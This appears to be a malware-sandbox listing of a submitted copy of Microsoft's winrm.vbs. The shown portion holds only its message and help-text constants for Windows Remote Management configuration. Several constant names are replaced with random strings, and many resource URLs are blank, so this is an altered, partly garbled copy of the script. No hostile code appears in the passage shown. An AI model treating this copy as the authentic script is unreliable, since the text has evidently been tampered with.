Static | ZeroBOX
No static analysis available.
' Copyright (c) Microsoft Corporation. All rights reserved.
' VBScript Source File
' Script Name: winrm.vbs
' Error codes
private const ERR_OK = 0
private const ERR_GENERAL_FAILURE = 1
' Messages
private const L_ONLYCSCRIPT_Message = "Can be executed only by cscript.exe."
private const NHDUWuU = "Unknown operation name: "
private const L_OP_Message = "Operation - "
private const dIjxqnS = "File does not exist: "
private const OiOeDLP = "Parameter is zero length #"
private const MmSW = "Switch not allowed with the given operation: "
private const UBDG = "Unknown switch: "
private const GLKK = "Missing switch name"
private const RpOk = "Invalid use of command line. Type ""winrm -?"" for help."
private const DcgN = "Type ""winrm -?"" for help."
private const xQAK = "Invalid usage of command line; winrm.vbs not found in command string."
private const MMuS = "A quoted parameter value must begin and end with quotes: "
private const aNDr = "Unexpected match count - one match is expected: "
private const KuPv = "Option is not unique: "
private const nvDO = "URI is missing"
private const puuL = "Action is missing"
private const icDx = "URI is 0 length"
private const L_URIZEROTOK_Message = "Invalid URI, token is 0 length"
private const cceWi = "Invalid WMI resource URI - no '/' found (at least 2 expected)"
private const qQNij = "Invalid WMI resource URI - only one '/' found (at least 2 expected)"
private const L_NOLASTTOK_Message = "Invalid URI - cannot locate last token for root node name"
private const LfbYS = "Syntax Error: input must be of the form {KEY=""VALUE""[;KEY=""VALUE""]}"
private const L_ARGNOVAL_Message = "Argument's value is not provided: "
private const L_XMLERROR_Message = "Unable to parse XML: "
private const L_XSLERROR_Message = "Unable to parse XSL file. Either it is inaccessible or invalid: "
private const L_MSXML6MISSING_Message = "Unable to load MSXML6, required by -format option and for set using ""@{...}"""
private const L_FORMATLERROR_Message = "Invalid option for -format: "
private const L_FORMATFAILED_Message = "Unable to reformat message. Raw, unformatted, message: "
private const L_PUT_PARAM_NOMATCH_Message = "Parameter name does not match any properties on resource: "
private const L_PUT_PARAM_MULTIMATCH_Message = "Parameter matches more than one property on resource: "
private const L_PUT_PARAM_NOARRAY_Message = "Multiple matching parameter names not allowedin @{...}: "
private const L_PUT_PARAM_NOTATTR_Message = "Parameter matches a non-text property on resource: "
private const L_PUT_PARAM_EMPTY_Message = "Parameter set is empty."
private const L_OPTIONS_PARAMETER_EMPTY_Message = "Options parameter has no value or is malformed."
private const L_RESOURCELOCATOR_Message = "Unable to create ResourceLocator object."
private const L_PUT_PARAM_NOINPUT_Message = "No input provided through ""@{...}"" or ""-file:"" commandline parameters."
private const L_ERR_Message = "Error: "
private const L_ERRNO_Message = "Error number: "
private const L_OpDoesntAcceptInput_ErrorMessage = "Input was supplied to an operation that does not accept input."
private const L_QuickConfigNoChangesNeeded_Message = "WinRM is already set up for remote management on this computer."
private const L_QuickConfig_MissingUpdateXml_0_ErrorMessage = "Could not find update instructions in analysis result."
private const L_QuickConfigUpdated_Message = "WinRM has been updated for remote management."
private const L_QuickConfigUpdateFailed_ErrorMessage = "One or more update steps could not be completed."
private const L_QuickConfig_InvalidBool_0_ErrorMessage = "Could not determine if remoting is enabled."
private const L_QuickConfig_RemotingDisabledbyGP_00_ErrorMessage = "Cannot complete the request due to a conflicting Group Policy setting."
private const L_QuickConfig_UpdatesNeeded_0_Message = "WinRM is not set up to allow remote access to this machine for management."
private const L_QuickConfig_UpdatesNeeded_1_Message = "The following changes must be made:"
private const L_QuickConfig_Prompt_0_Message = "Make these changes [y/n]? "
private const L_QuickConfigNoServiceChangesNeeded_Message = "WinRM is already set up to receive requests on this computer."
private const L_QuickConfigNoServiceChangesNeeded_Message2 = "WinRM service is already running on this machine."
private const L_QuickConfigUpdatedService_Message = "WinRM has been updated to receive requests."
private const L_QuickConfig_ServiceUpdatesNeeded_0_Message = "WinRM is not set up to receive requests on this machine."
private const L_Help_Title_0_Message = "Windows Remote Management Command Line Tool"
private const L_Help_Blank_0_Message = ""
private const L_Help_SeeAlso_Title_Message = "See also:"
private const X_Help_SeeAlso_Aliases_Message = " winrm help aliases"
private const X_Help_SeeAlso_Config_Message = " winrm help config"
private const X_Help_SeeAlso_CertMapping_Message = " winrm help certmapping"
private const X_Help_SeeAlso_CustomRemoteShell_Message = " winrm help customremoteshell"
private const X_Help_SeeAlso_Input_Message = " winrm help input"
private const X_Help_SeeAlso_Filters_Message = " winrm help filters"
private const X_Help_SeeAlso_Switches_Message = " winrm help switches"
private const X_Help_SeeAlso_Uris_Message = " winrm help uris"
private const X_Help_SeeAlso_Auth_Message = " winrm help auth"
private const X_Help_SeeAlso_Set_Message = " winrm set -?"
private const X_Help_SeeAlso_Create_Message = " winrm create -?"
private const X_Help_SeeAlso_Enumerate_Message = " winrm enumerate -?"
private const X_Help_SeeAlso_Invoke_Message = " winrm invoke -?"
private const X_Help_SeeAlso_Remoting_Message = " winrm help remoting"
private const X_Help_SeeAlso_configSDDL_Message = " winrm configsddl -?"
private const L_HelpHelp_000_0_Message = "Windows Remote Management (WinRM) is the Microsoft implementation of "
private const L_HelpHelp_001_0_Message = "the WS-Management protocol which provides a secure way to communicate "
private const L_HelpHelp_001_1_Message = "with local and remote computers using web services. "
private const L_HelpHelp_002_0_Message = ""
private const L_HelpHelp_003_0_Message = "Usage:"
private const L_HelpHelp_004_0_Message = " winrm OPERATION RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpHelp_005_0_Message = " [@{KEY=VALUE[;KEY=VALUE]...}]"
private const L_HelpHelp_007_0_Message = ""
private const L_HelpHelp_008_0_Message = "For help on a specific operation:"
private const L_HelpHelp_009_0_Message = " winrm g[et] -? Retrieving management information."
private const L_HelpHelp_010_0_Message = " winrm s[et] -? Modifying management information."
private const L_HelpHelp_011_0_Message = " winrm c[reate] -? Creating new instances of management resources."
private const L_HelpHelp_012_0_Message = " winrm d[elete] -? Remove an instance of a management resource."
private const L_HelpHelp_013_0_Message = " winrm e[numerate] -? List all instances of a management resource."
private const L_HelpHelp_014_0_Message = " winrm i[nvoke] -? Executes a method on a management resource."
private const L_HelpHelp_015_0_Message = " winrm id[entify] -? Determines if a WS-Management implementation is"
private const L_HelpHelp_015_1_Message = " running on the remote machine."
private const L_HelpHelp_016_0_Message = " winrm quickconfig -? Configures this machine to accept WS-Management"
private const L_HelpHelp_016_1_Message = " requests from other machines."
private const L_HelpHelp_016_3_Message = " winrm configSDDL -? Modify an existing security descriptor for a URI."
private const L_HelpHelp_016_4_Message = " winrm helpmsg -? Displays error message for the error code."
private const L_HelpHelp_017_0_Message = ""
private const L_HelpHelp_018_0_Message = "For help on related topics:"
private const L_HelpHelp_019_0_Message = " winrm help uris How to construct resource URIs."
private const L_HelpHelp_020_0_Message = " winrm help aliases Abbreviations for URIs."
private const L_HelpHelp_021_0_Message = " winrm help config Configuring WinRM client and service settings."
private const L_HelpHelp_021_2_Message = " winrm help certmapping Configuring client certificate access."
private const L_HelpHelp_022_0_Message = " winrm help remoting How to access remote machines."
private const L_HelpHelp_023_0_Message = " winrm help auth Providing credentials for remote access."
private const L_HelpHelp_024_0_Message = " winrm help input Providing input to create, set, and invoke."
private const L_HelpHelp_025_0_Message = " winrm help switches Other switches such as formatting, options, etc."
private const L_HelpHelp_026_0_Message = " winrm help proxy Providing proxy information."
private const L_HelpGet_000_0_Message = "winrm get RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpGet_001_0_Message = ""
private const L_HelpGet_002_0_Message = "Retrieves instances of RESOURCE_URI using specified "
private const L_HelpGet_003_0_Message = "options and key-value pairs."
private const L_HelpGet_004_0_Message = ""
private const L_HelpGet_005_0_Message = "Example: Retrieve current configuration in XML format:"
private const X_HelpGet_006_0_Message = " winrm get winrm/config -format:pretty"
private const L_HelpGet_007_0_Message = ""
private const L_HelpGet_008_0_Message = "Example: Retrieve spooler instance of Win32_Service class:"
private const X_HelpGet_009_0_Message = " winrm get wmicimv2/Win32_Service?Name=spooler"
private const L_HelpGet_010_0_Message = ""
private const L_HelpGet_014_0_Message = "Example: Retrieve a certmapping entry on this machine:"
private const X_HelpGet_015_0_Message = " winrm get winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=**"
private const L_HelpGet_016_0_Message = ""
private const L_HelpSet_001_0_Message = "winrm set RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpSet_002_0_Message = " [@{KEY=""VALUE""[;KEY=""VALUE""]}]"
private const L_HelpSet_003_0_Message = " [-file:VALUE]"
private const L_HelpSet_004_0_Message = ""
private const L_HelpSet_005_0_Message = "Modifies settings in RESOURCE_URI using specified switches"
private const L_HelpSet_006_0_Message = "and input of changed values via key-value pairs or updated "
private const L_HelpSet_007_0_Message = "object via an input file."
private const L_HelpSet_008_0_Message = ""
private const L_HelpSet_009_0_Message = "Example: Modify a configuration property of WinRM:"
private const X_HelpSet_010_0_Message = " winrm set winrm/config @{MaxEnvelopeSizekb=""100""}"
private const L_HelpSet_011_0_Message = ""
private const L_HelpSet_012_0_Message = "Example: Disable a listener on this machine:"
private const X_HelpSet_013_0_Message = " winrm set winrm/config/Listener?Address=*+Transport=HTTPS @{Enabled=""false""}"
private const L_HelpSet_014_0_Message = ""
private const L_HelpSet_018_0_Message = "Example: Disable a certmapping entry on this machine:"
private const X_HelpSet_019_0_Message = " Winrm set winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=** @{Enabled=""false""}"
private const L_HelpSet_020_0_Message = ""
private const L_HelpCreate_001_0_Message = "winrm create RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpCreate_002_0_Message = " [@{KEY=""VALUE""[;KEY=""VALUE""]}]"
private const L_HelpCreate_003_0_Message = " [-file:VALUE]"
private const L_HelpCreate_004_0_Message = ""
private const L_HelpCreate_005_0_Message = "Spawns an instance of RESOURCE_URI using specified "
private const L_HelpCreate_006_0_Message = "key-value pairs or input file."
private const L_HelpCreate_007_0_Message = ""
private const L_HelpCreate_008_0_Message = "Example: Create instance of HTTP Listener on IPv6 address:"
private const X_HelpCreate_009_0_Message = " winrm create winrm/config/Listener?Address=IP:3ffe:8311:ffff:f2c1::5e61+Transport=HTTP"
private const L_HelpCreate_010_0_Message = ""
private const L_HelpCreate_011_0_Message = "Example: Create instance of HTTPS Listener on all IPs:"
private const X_HelpCreate_012_0_Message = " winrm create winrm/config/Listener?Address=*+Transport=HTTPS @{Hostname=""HOST"";CertificateThumbprint=""XXXXXXXXXX""}"
private const L_HelpCreate_013_0_Message = "Note: XXXXXXXXXX represents a 40-digit hex string; see help config."
private const L_HelpCreate_014_0_Message = ""
private const L_HelpCreate_015_0_Message = "Example: Create a windows shell command instance from xml:"
private const X_HelpCreate_016_0_Message = " winrm create shell/cmd -file:shell.xml"
private const L_HelpCreate_017_0_Message = ""
private const L_HelpCreate_022_0_Message = "Example: Create a CertMapping entry:"
private const X_HelpCreate_023_0_Message = " winrm create winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=** @{UserName=""USERNAME"";Password=""PASSWORD""} -remote:localhost"
private const L_HelpCreate_024_0_Message = ""
private const L_HelpDelete_001_0_Message = "winrm delete RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpDelete_002_0_Message = ""
private const L_HelpDelete_003_0_Message = "Removes an instance of RESOURCE_URI."
private const L_HelpDelete_004_0_Message = ""
private const L_HelpDelete_005_0_Message = "Example: delete the HTTP listener on this machine for given IP address:"
private const X_HelpDelete_006_0_Message = " winrm delete winrm/config/Listener?Address=IP:"
private const L_HelpDelete_007_0_Message = ""
private const L_HelpDelete_008_0_Message = "Example: delete a certmapping entry:"
private const X_HelpDelete_009_0_Message = " winrm delete winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=**"
private const L_HelpDelete_010_0_Message = ""
private const L_HelpEnum_001_0_Message = "winrm enumerate RESOURCE_URI [-ReturnType:Value] [-Shallow]"
private const L_HelpEnum_001_1_Message = " [-BasePropertiesOnly] [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpEnum_002_0_Message = ""
private const L_HelpEnum_003_0_Message = "Lists instances of RESOURCE_URI."
private const L_HelpEnum_004_0_Message = "Can limit the instances returned by using a filter and dialect if the "
private const L_HelpEnum_005_0_Message = "resource supports these."
private const L_HelpEnum_006_0_Message = ""
private const L_HelpEnum_006_1_Message = "ReturnType"
private const L_HelpEnum_006_2_Message = "----------"
private const L_HelpEnum_006_3_Message = "returnType is an optional switch that determines the type of data returned."
private const L_HelpEnum_006_4_Message = "Possible options are 'Object', 'EPR' and 'ObjectAndEPR'. Default is Object"
private const L_HelpEnum_006_5_Message = "If Object is specified or if switch is omitted, then only the objects are"
private const L_HelpEnum_006_6_Message = "returned."
private const L_HelpEnum_006_7_Message = "If EPR is specified, then only the EPRs (End point reference) of the"
private const L_HelpEnum_006_8_Message = "objects are returned. EPRs contain information about the resource URI and"
private const L_HelpEnum_006_9_Message = "selectors for the instance."
private const L_HelpEnum_006_10_Message = "If ObjectAndEPR is specified, then both the object and the associated EPRs"
private const L_HelpEnum_006_11_Message = "are returned."
private const L_HelpEnum_006_12_Message = ""
private const L_HelpEnum_006_13_Message = "Shallow"
private const L_HelpEnum_006_14_Message = "-------"
private const L_HelpEnum_006_15_Message = "Enumerate only instances of the base class specified in the resource URI."
private const L_HelpEnum_006_16_Message = "If this flag is not specified, instances of the base class specified in "
private const L_HelpEnum_006_17_Message = "the resource URI and all its derived classes are returned."
private const L_HelpEnum_006_18_Message = ""
private const L_HelpEnum_006_19_Message = "BasePropertiesOnly"
private const L_HelpEnum_006_20_Message = "------------------"
private const L_HelpEnum_006_21_Message = "Includes only those properties that are part of the base class specified"
private const L_HelpEnum_006_22_Message = "in the resource URI. When -Shallow is specified, this flag has no effect. "
private const L_HelpEnum_006_23_Message = ""
private const L_HelpEnum_007_0_Message = "Example: List all WinRM listeners on this machine:"
private const X_HelpEnum_008_0_Message = " winrm enumerate winrm/config/Listener"
private const L_HelpEnum_009_0_Message = ""
private const L_HelpEnum_010_0_Message = "Example: List all instances of Win32_Service class:"
private const X_HelpEnum_011_0_Message = " winrm enumerate wmicimv2/Win32_Service"
private const L_HelpEnum_012_0_Message = ""
'private const L_HelpEnum_013_0_Message = "Example: List all auto start services that are stopped:"
'private const X_HelpEnum_014_0_Message = " winrm enum wmicimv2/* -filter:""select * from win32_service where StartMode=\""Auto\"" and State = \""Stopped\"" """
'private const L_HelpEnum_015_0_Message = ""
private const L_HelpEnum_016_0_Message = "Example: List all shell instances on a machine:"
private const X_HelpEnum_017_0_Message = " winrm enum shell/cmd"
private const L_HelpEnum_018_0_Message = ""
private const L_HelpEnum_019_0_Message = "Example: List resources accessible to the current user:"
private const X_HelpEnum_020_0_Message = " winrm enum winrm/config/resource"
private const L_HelpEnum_021_0_Message = ""
private const L_HelpEnum_022_0_Message = "Example: List all certmapping settings:"
private const X_HelpEnum_023_0_Message = " winrm enum winrm/config/service/certmapping"
private const L_HelpEnum_024_0_Message = ""
private const L_HelpInvoke_001_0_Message = "winrm invoke ACTION RESOURCE_URI [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpInvoke_002_0_Message = " [@{KEY=""VALUE""[;KEY=""VALUE""]}]"
private const L_HelpInvoke_003_0_Message = " [-file:VALUE]"
private const L_HelpInvoke_004_0_Message = ""
private const L_HelpInvoke_005_0_Message = "Executes method specified by ACTION on target object specified by RESOURCE_URI"
private const L_HelpInvoke_006_0_Message = "with parameters specified by key-value pairs."
private const L_HelpInvoke_007_0_Message = ""
private const L_HelpInvoke_008_0_Message = "Example: Call StartService method on Spooler service:"
private const X_HelpInvoke_009_0_Message = " winrm invoke StartService wmicimv2/Win32_Service?Name=spooler"
private const L_HelpInvoke_010_0_Message = ""
private const L_HelpInvoke_011_0_Message = "Example: Call StopService method on Spooler service using XML file:"
private const X_HelpInvoke_012_0_Message = " winrm invoke StopService wmicimv2/Win32_Service?Name=spooler -file:input.xml"
private const L_HelpInvoke_013_0_Message = "Where input.xml:"
private const X_HelpInvoke_014_0_Message = "<p:StopService_INPUT xmlns:p=""""/>"
private const L_HelpInvoke_015_0_Message = ""
private const L_HelpInvoke_016_0_Message = "Example: Call Create method of Win32_Process class with specified parameters:"
private const X_HelpInvoke_017_0_Message = " winrm invoke Create wmicimv2/Win32_Process @{CommandLine=""notepad.exe"";CurrentDirectory=""C:\""}"
private const L_HelpInvoke_018_0_Message = ""
private const L_HelpInvoke_019_0_Message = "Example: Restore the default winrm configuration:"
private const L_HelpInvoke_019_1_Message = "Note that this will not restore the default winrm plugin configuration:"
private const X_HelpInvoke_020_0_Message = " winrm invoke restore winrm/config @{}"
private const L_HelpInvoke_021_0_Message = ""
private const L_HelpInvoke_022_0_Message = "Example: Restore the default winrm plugin configuration:"
private const L_HelpInvoke_022_1_Message = "Note that all external plugins will be unregistered during this operation:"
private const X_HelpInvoke_023_0_Message = " winrm invoke restore winrm/config/plugin @{}"
private const X_HelpIdentify_001_0_Message = "winrm identify [-SWITCH:VALUE [-SWITCH:VALUE] ...]"
private const L_HelpIdentify_003_0_Message = ""
private const L_HelpIdentify_004_0_Message = "Issues an operation against a remote machine to see if the WS-Management "
private const L_HelpIdentify_005_0_Message = "service is running. This operation must be run with the '-remote' switch."
private const L_HelpIdentify_006_0_Message = "To run this operation unauthenticated against the remote machine use the"
private const L_HelpIdentify_007_0_Message = "-auth:none"
private const L_HelpIdentify_008_0_Message = ""
private const L_HelpIdentify_009_0_Message = "Example: identify if WS-Management is running on"
private const X_HelpIdentify_010_0_Message = " winrm identify"
private const X_HelpHelpMessaage_001_0_Message = "winrm helpmsg errorcode"
private const X_HelpHelpMessaage_002_0_Message = ""
private const X_HelpHelpMessaage_003_0_Message = "Displays error message associate with the error code."
private const X_HelpHelpMessaage_004_0_Message = "Example:"
private const X_HelpHelpMessaage_006_0_Message = " winrm helpmsg 0x5"
private const L_HelpAlias_001_0_Message = "Aliasing allows shortcuts to be used in place of full Resource URIs."
private const L_HelpAlias_002_0_Message = "Available aliases and the Resource URIs they substitute for are:"
private const L_HelpAlias_003_0_Message = ""
private const X_HelpAlias_004_0_Message = "wmi ="
private const X_HelpAlias_005_0_Message = "wmicimv2 ="
private const X_HelpAlias_006_0_Message = "cimv2 ="
private const X_HelpAlias_007_0_Message = "winrm ="
private const X_HelpAlias_008_0_Message = "wsman ="
private const X_HelpAlias_009_0_Message = "shell ="
private const L_HelpAlias_010_0_Message = ""
private const L_HelpAlias_011_0_Message = "Example: using full Resource URI:"
private const x_HelpAlias_012_0_Message = " winrm get"
private const L_HelpAlias_013_0_Message = ""
private const L_HelpAlias_014_0_Message = "Example: using alias:"
private const X_HelpAlias_015_0_Message = " winrm get wmicimv2/Win32_Service?Name=WinRM"
private const L_HelpUris_001_0_Message = "Universal Resource Identifiers (URI) specify management resources to be"
private const L_HelpUris_002_0_Message = "used for operations."
private const L_HelpUris_003_0_Message = ""
private const L_HelpUris_004_0_Message = "Selectors and values are passed after the URI in the form:"
private const X_HelpUris_005_0_Message = " RESOURCE_URI?NAME=VALUE[+NAME=VALUE]..."
private const L_HelpUris_006_0_Message = ""
private const L_HelpUris_007_0_Message = "URIs for all information in WMI are of the following form:"
private const X_HelpUris_008_0_Message = " WMI path = \\root\NAMESPACE[\NAMESPACE]\CLASS"
private const X_HelpUris_009_0_Message = " URI =[/NAMESPACE]/CLASS"
private const X_HelpUris_010_0_Message = " ALIAS = wmi/root/NAMESPACE[/NAMESPACE]/CLASS"
private const L_HelpUris_011_0_Message = ""
private const L_HelpUris_012_0_Message = "Example: Get information about WinRM service from WMI using single selector"
private const X_HelpUris_013_0_Message = " WMI path = \\root\cimv2\Win32_Service"
private const X_HelpUris_013_1_Message = " URI ="
private const X_HelpUris_014_0_Message = " ALIAS = wmi/root/cimv2/Win32_Service?Name=WinRM"
private const L_HelpUris_015_0_Message = ""
private const L_HelpUris_015_1_Message = "When enumerating WMI instances using a WQL filter,"
private const L_HelpUris_015_2_Message = "the CLASS must be ""*"" (star) and no selectors should be specified."
private const L_HelpUris_015_3_Message = "Example:"
private const X_HelpUris_015_4_Message = "URI =*"
private const L_HelpUris_015_5_Message = ""
private const L_HelpUris_015_6_Message = "When accesing WMI singleton instances, no selectors should be specified."
private const L_HelpUris_015_7_Message = "Example:"
private const X_HelpUris_015_8_Message = "URI ="
private const L_HelpUris_015_9_Message = ""
private const L_HelpUris_016_0_Message = "Note: Some parts of RESOURCE_URI may be case-sensitive. When using create or"
private const L_HelpUris_017_0_Message = "invoke, the last part of the resource URI must match case-wise the top-level"
private const L_HelpUris_018_0_Message = "element of the expected XML."
private const L_HelpConfig_001_0_Message = "Configuration for WinRM is managed using the winrm command line or through GPO."
private const L_HelpConfig_002_0_Message = "Configuration includes global configuration for both the client and service."
private const L_HelpConfig_003_0_Message = ""
private const L_HelpConfig_004_0_Message = "The WinRM service requires at least one listener to indicate the IP address(es)"
private const L_HelpConfig_005_0_Message = "on which to accept WS-Management requests. For example, if the machine has "
private const L_HelpConfig_006_0_Message = "multiple network cards, WinRM can be configured to only accept requests from"
private const L_HelpConfig_007_0_Message = "one of the network cards."
private const L_HelpConfig_008_0_Message = ""
private const L_HelpConfig_009_0_Message = "Global configuration"
private const X_HelpConfig_010_0_Message = " winrm get winrm/config"
private const X_HelpConfig_011_0_Message = " winrm get winrm/config/client"
private const X_HelpConfig_012_0_Message = " winrm get winrm/config/service"
private const X_HelpConfig_012_1_Message = " winrm enumerate winrm/config/resource"
private const X_HelpConfig_012_2_Message = " winrm enumerate winrm/config/listener"
private const X_HelpConfig_012_3_Message = " winrm enumerate winrm/config/plugin"
private const X_HelpConfig_012_4_Message = " winrm enumerate winrm/config/service/certmapping"
private const L_HelpConfig_013_0_Message = ""
private const L_HelpConfig_014_0_Message = "Network listening requires one or more listeners. "
private const L_HelpConfig_015_0_Message = "Listeners are identified by two selectors: Address and Transport."
private const L_HelpConfigAddress_001_0_Message = "Address must be one of:"
private const L_HelpConfigAddress_002_0_Message = " * - Listen on all IPs on the machine "
private const L_HelpConfigAddress_003_0_Message = " IP: - Listen only on the specified IP address"
private const L_HelpConfigAddress_004_0_Message = " MAC:... - Listen only on IP address for the specified MAC"
private const L_HelpConfigAddress_005_0_Message = ""
private const L_HelpConfigAddress_006_0_Message = "Note: All listening is subject to the IPv4Filter and IPv6Filter under "
private const L_HelpConfigAddress_007_0_Message = "config/service."
private const L_HelpConfigAddress_008_0_Message = "Note: IP may be an IPv4 or IPv6 address."
private const L_HelpConfigTransport_001_0_Message = "Transport must be one of:"
private const L_HelpConfigTransport_002_0_Message = " HTTP - Listen for requests on HTTP (default port is 5985)"
private const L_HelpConfigTransport_003_0_Message = " HTTPS - Listen for requests on HTTPS (default port is 5986)"
private const L_HelpConfigTransport_004_0_Message = ""
private const L_HelpConfigTransport_005_0_Message = "Note: HTTP traffic by default only allows messages encrypted with "
private const L_HelpConfigTransport_006_0_Message = "the Negotiate or Kerberos SSP."
private const L_HelpConfigTransport_007_0_Message = ""
private const L_HelpConfigTransport_008_0_Message = ""
private const L_HelpConfigTransport_009_0_Message = "When configuring HTTPS, the following properties are used:"
private const L_HelpConfigTransport_010_0_Message = " Hostname - Name of this machine; must match CN in certificate."
private const L_HelpConfigTransport_011_0_Message = " CertificateThumbprint - hexadecimal thumbprint of certificate appropriate for"
private const L_HelpConfigTransport_012_0_Message = " Server Authentication."
private const L_HelpConfigTransport_013_0_Message = "Note: If only Hostname is supplied, WinRM will try to find an appropriate"
private const L_HelpConfigTransport_014_0_Message = "certificate."
private const L_HelpConfigExamples_001_0_Message = "Example: To listen for requests on HTTP on all IPs on the machine:"
private const X_HelpConfigExamples_002_0_Message = " winrm create winrm/config/listener?Address=*+Transport=HTTP"
private const L_HelpConfigExamples_003_0_Message = ""
private const L_HelpConfigExamples_004_0_Message = "Example: To disable a given listener"
private const X_HelpConfigExamples_005_0_Message = " winrm set winrm/config/listener?Address=IP: @{Enabled=""false""}"
private const L_HelpConfigExamples_006_0_Message = ""
private const L_HelpConfigExamples_007_0_Message = "Example: To enable basic authentication on the client but not the service:"
private const X_HelpConfigExamples_008_0_Message = " winrm set winrm/config/client/auth @{Basic=""true""}"
private const L_HelpConfigExamples_009_0_Message = ""
private const L_HelpConfigExamples_010_0_Message = "Example: To enable Negotiate for all workgroup machines."
private const X_HelpConfigExamples_011_0_Message = " winrm set winrm/config/client @{TrustedHosts=""<local>""}"
private const L_HelpConfigExamples_012_0_Message = ""
private const L_HelpConfigExamples_013_0_Message = "Example: To add an IPv4 and IPv6 host address to TrustedHosts."
private const X_HelpConfigExamples_014_0_Message = " winrm set winrm/config/client @{TrustedHosts="",[1:2:3::8]""}"
private const L_HelpConfigExamples_015_0_Message = ""
private const L_HelpConfigExamples_016_0_Message = " Note: Computers in the TrustedHosts list might not be authenticated"
' HELP - CertMapping
private const L_HelpCertMapping_001_0_Message = "Certificate mapping remote access to WinRM using client certificates is "
private const L_HelpCertMapping_002_0_Message = "stored in the certificate mapping table identified by the "
private const L_HelpCertMapping_003_0_Message = "following resource URI:"
private const L_HelpCertMapping_003_1_Message = ""
private const L_HelpCertMapping_004_0_Message = " winrm/config/service/CertMapping"
private const L_HelpCertMapping_005_0_Message = ""
private const L_HelpCertMapping_006_0_Message = "Each entry in this table contains five properties:"
private const L_HelpCertMapping_007_0_Message = " Issuer - Thumbprint of the issuer certificate."
private const L_HelpCertMapping_008_0_Message = " Subject - Subject field of client certificate."
private const L_HelpCertMapping_009_0_Message = " URI - The URI or URI prefix for which this mapping applies."
private const L_HelpCertMapping_009_1_Message = " Username - Local username for processing the request."
private const L_HelpCertMapping_009_2_Message = " Password - Local password for processing the request."
private const L_HelpCertMapping_009_3_Message = " Enabled - Use in processing if true."
private const L_HelpCertMapping_010_0_Message = " "
private const L_HelpCertMapping_011_0_Message = "For a client certificate to be applicable, the issuer certificate must be "
private const L_HelpCertMapping_012_0_Message = "available locally and match the thumbprint in the entry Issuer property"
private const L_HelpCertMapping_012_1_Message = ""
private const L_HelpCertMapping_012_2_Message = "For a client certificate to be applicable, its DNS or Principal name "
private const L_HelpCertMapping_013_0_Message = "(from the SubjectAlternativeName field) must match the Subject property."
private const L_HelpCertMapping_014_0_Message = "The value can start with a '*' wildcard."
private const L_HelpCertMapping_014_1_Message = "The URI identifies for which resources the indicated client certificates ."
private const L_HelpCertMapping_014_2_Message = "should be mapped."
private const L_HelpCertMapping_014_3_Message = "The value can end with a '*' wildcard."
private const L_HelpCertMapping_014_4_Message = ""
private const L_HelpCertMapping_015_0_Message = "If the client certificate matches the entry and it is enabled, the "
private const L_HelpCertMapping_016_0_Message = "request is processed under the local account with the given username "
private const L_HelpCertMapping_017_0_Message = "and password after ensuring that user has access to the resource as "
private const L_HelpCertMapping_018_0_Message = "defined by the URI security table."
private const L_HelpCertMapping_019_0_Message = ""
private const L_HelpCertMapping_020_0_Message = "When creating a new entry or changing the password of an existing entry, "
private const L_HelpCertMapping_021_0_Message = "the -r switch must be used since the WinRM service must store the password"
private const L_HelpCertMapping_022_0_Message = "for future use."
private const L_HelpCertMappingExamples_001_0_Message = "Example: To see the current CertMapping configuration"
private const X_HelpCertMappingExamples_002_0_Message = " winrm enumerate winrm/config/service/CertMapping"
private const L_HelpCertMappingExamples_003_0_Message = "Example: Create a CertMapping entry:"
private const X_HelpCertMappingExamples_004_0_Message = " winrm create winrm/config/service/certmapping?Issuer=1212131238d84023982e381f20391a2935301923+Subject=** @{UserName=""USERNAME"";Password=""PASSWORD""} -remote:localhost"
private const L_HelpCertMappingExamples_005_0_Message = ""
private const L_HelpConfigsddl_000_1_Message = " winrm configsddl RESOURCE_URI"
private const L_HelpConfigsddl_001_0_Message = ""
private const L_HelpConfigsddl_002_0_Message = "Changes an existing entry in the plugin configuration to "
private const L_HelpConfigsddl_002_1_Message = "control remote access to WinRM resources."
private const L_HelpConfigsddl_003_0_Message = "This command will fail if the plugin does not exist."
private const L_HelpConfigsddl_004_0_Message = ""
private const L_HelpConfigsddl_005_0_Message = "This command will launch a GUI to edit the security settings."
private const L_HelpConfigsddl_005_1_Message = ""
private const L_HelpConfigsddl_006_0_Message = "RESOURCE_URI is always treated as a prefix."
private const L_HelpConfigsddl_010_0_Message = ""
private const L_HelpConfigsddl_011_0_Message = "To change the default security (the RootSDDL setting) use:"
private const X_HelpConfigsddl_012_0_Message = " winrm configsddl default"
private const X_HelpQuickConfig_001_0_Message = "winrm quickconfig [-quiet] [-transport:VALUE] [-force]"
private const X_HelpQuickConfig_002_0_Message = ""
private const L_HelpQuickConfig_003_0_Message = "Performs configuration actions to enable this machine for remote management."
private const L_HelpQuickConfig_004_0_Message = "Includes:"
private const L_HelpQuickConfig_005_0_Message = " 1. Start the WinRM service"
private const L_HelpQuickConfig_006_0_Message = " 2. Set the WinRM service type to auto start"
private const L_HelpQuickConfig_007_0_Message = " 3. Create a listener to accept request on any IP address"
private const L_HelpQuickConfig_008_0_Message = " 4. Enable firewall exception for WS-Management traffic (for http only)"
private const X_HelpQuickConfig_009_0_Message = ""
private const X_HelpQuickConfig_010_0_Message = "-q[uiet]"
private const X_HelpQuickConfig_010_1_Message = "--------"
private const L_HelpQuickConfig_011_0_Message = "If present, quickconfig will not prompt for confirmation."
private const X_HelpQuickConfig_012_0_Message = "-transport:VALUE"
private const X_HelpQuickConfig_013_0_Message = "----------------"
private const L_HelpQuickConfig_014_0_Message = "Perform quickconfig for specific transport."
private const L_HelpQuickConfig_015_0_Message = "Possible options are http and https. Defaults to http."
private const X_HelpQuickConfig_016_0_Message = "-force"
private const X_HelpQuickConfig_017_0_Message = "--------"
private const L_HelpQuickConfig_018_0_Message = "If present, quickconfig will not prompt for confirmation, and will enable "
